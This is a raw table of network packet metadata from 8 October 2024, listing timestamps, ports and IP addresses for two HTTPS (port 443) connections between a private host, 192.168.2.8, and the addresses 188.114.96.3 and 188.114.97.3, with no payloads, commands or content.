Oct 8, 2024 20:52:12.801964998 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.801971912 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.802014112 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.804157019 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.804176092 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.804240942 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.804250956 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.804291964 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.887645006 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.887665033 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.887765884 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.887814045 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.888019085 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.888032913 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.888050079 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.888128042 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.888176918 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.888215065 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.888252974 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.888258934 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.888289928 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.888468027 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.888484001 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.888533115 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.888540983 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.888564110 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.890279055 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.890300035 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.890369892 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.890377998 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.890404940 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.890922070 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.890934944 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.890993118 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.891000986 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.894948006 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.894961119 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.895032883 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.895045042 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.937525034 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.977072954 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.977098942 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.977241993 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.977252007 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.977262974 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.977291107 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.977323055 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.977329016 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.977351904 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.977366924 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.977375984 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.977386951 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.977392912 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.977415085 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.977461100 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.977519989 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.977535009 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.977593899 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.977597952 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.977658033 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.977860928 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.977878094 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.977938890 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.977943897 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.977986097 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.978823900 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.978838921 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.978934050 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.978938103 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.979022026 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.979252100 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.979270935 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.979408979 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.979408979 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.979414940 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.979463100 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.983045101 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.983067989 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.983136892 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:12.983143091 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:12.983182907 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.065304995 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.065334082 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.065431118 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.065440893 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.065480947 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.065524101 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.065538883 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.065589905 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.065593958 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.065632105 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.066109896 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.066124916 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.066171885 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.066175938 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.066206932 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.066216946 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.066381931 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.066440105 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.066456079 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.066509008 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.066685915 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.066699982 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.066756010 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.066760063 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.066797972 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.067586899 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.067605019 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.067651987 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.067656040 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.067692041 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.067986965 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.068002939 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.068058014 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.068062067 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.068100929 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.072500944 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.072523117 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.072597980 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.072607994 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.072647095 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.155709982 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.155792952 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.155831099 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.155842066 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.155863047 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.155920029 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.156063080 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.156081915 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.156126976 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.156133890 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.156152010 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.156173944 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.156178951 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.156207085 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.156229019 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.156390905 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.156450987 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.156472921 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.156498909 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.156544924 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.156548977 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.156574011 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.156589031 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.156774044 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.156790018 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.156835079 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.156841040 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.156879902 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.156949997 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.157002926 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.157056093 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.157119036 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.157203913 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.157222033 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.157351971 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.157351971 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.157360077 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.157403946 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.161149025 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.161171913 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.161241055 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.161247015 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.161287069 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.244230032 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.244256973 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.244307995 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.244319916 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.244379044 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.244379044 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.244477987 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.244534969 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.244574070 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.244632006 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.244755983 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.244771004 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.244827032 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.244831085 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.244864941 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.244915009 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.244980097 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.245049953 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.245110035 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.245191097 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.245204926 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.245268106 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.245271921 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.245325089 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.245541096 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.245554924 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.245609999 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.245641947 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.245671988 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.245677948 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.245702028 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.250365973 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.250386000 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.250458002 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.250468016 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.250483036 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.296461105 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.332998037 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.333019972 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.333095074 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.333107948 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.333147049 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.333498001 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.333513021 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.333559036 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.333573103 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.333578110 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.333596945 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.333625078 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.333628893 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.333656073 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.333672047 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.333837986 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.333853006 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.333885908 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.333910942 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.333914995 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.333957911 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.334003925 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.334435940 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.334450960 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.334506035 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.334511042 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.334850073 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.334871054 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.334903002 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.334908009 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.334919930 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.335275888 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.335411072 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.339340925 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.339410067 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.339467049 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.339519978 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.431265116 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.431308985 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.431346893 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.431356907 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.431405067 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.431405067 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.431438923 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 8, 2024 20:52:13.431508064 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:13.440268993 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 8, 2024 20:52:14.029829979 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:14.029879093 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.029956102 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:14.030275106 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:14.030289888 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.664324045 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.664406061 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:14.667309999 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:14.667330027 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.667653084 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.668524981 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:14.711406946 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.785999060 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.786037922 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.786066055 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.786092997 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.786098957 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:14.786122084 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.786132097 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.786138058 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:14.786166906 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:14.786185980 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.786227942 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.786267042 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:14.786288977 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.786613941 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.786640882 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.786662102 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:14.786674023 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.786720991 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:14.872731924 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.872791052 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.872817993 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.872843027 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.872849941 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:14.872890949 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.872909069 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:14.873008966 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.873039961 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.873059034 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:14.873070955 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.873116016 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:14.873126030 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.873796940 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.873827934 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.873855114 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:14.873856068 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.873874903 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.873903990 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:14.874609947 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.874650955 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.874661922 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:14.874680996 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.874711037 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.874721050 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:14.874731064 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.874769926 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:14.875375032 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.875478029 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.875500917 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.875528097 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:14.875545979 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.875582933 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:14.876207113 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.877604961 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.877669096 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:14.877685070 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.921467066 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:14.959328890 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.959393978 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.959420919 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.959465981 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.959465981 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:14.959502935 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.959559917 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:14.959561110 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.959572077 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.959608078 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:14.959620953 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:14.959635019 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.959686041 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:14.959697962 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.959722996 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.959743977 CEST	49707	443	192.168.2.8	188.114.97.3
Oct 8, 2024 20:52:14.959750891 CEST	443	49707	188.114.97.3	192.168.2.8
Oct 8, 2024 20:52:14.959778070 CEST	49707	443	192.168.2.8	188.114.97.3
